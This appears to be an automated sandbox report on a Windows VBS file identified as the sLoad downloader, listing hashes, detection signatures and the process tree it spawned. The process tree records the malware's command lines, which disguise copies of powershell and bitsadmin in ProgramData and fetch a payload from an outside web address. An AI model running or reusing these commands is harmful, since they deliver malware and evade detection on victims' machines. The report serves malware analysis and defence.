Analysis
-
max time kernel
28s -
max time network
29s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
11-01-2021 08:44
General
-
Target
Allegato_doc_02613440060.vbs
-
Size
8KB
-
MD5
6266da42dda2a91e97c63181b85b26d4
-
SHA1
2a0673cc7ea00b5187dac046b906aa1018317236
-
SHA256
12bad94c43427bae4e3855ebdd60d32d7a6305f108a811ead926950450ec503b
-
SHA512
fed5ca3e0b5f2214d12c6e8e6d86b6f96589e4629a588bb91cb3df90e3f20c17bb0413f9cbc1683a64642a5b2aa1ddc3ce2a59bb674febe28676c5a5157913c6
Score
10/10
Malware Config
Signatures
-
sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
-
Executes dropped EXE 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_02613440060.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fatSkEH.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\NXBtfaY*.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fatSkEH.exe3⤵
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\NXBtfaY*.exe3⤵
-
-
-
C:\ProgramData\NXBtfaYin.exe"C:\ProgramData\NXBtfaYin.exe" /transfer vQtoGc /download https://ladiesincode.com/ladi/02613440060/maps.png C:\Users\Admin\AppData\Roaming\maps.png2⤵
- Executes dropped EXE
-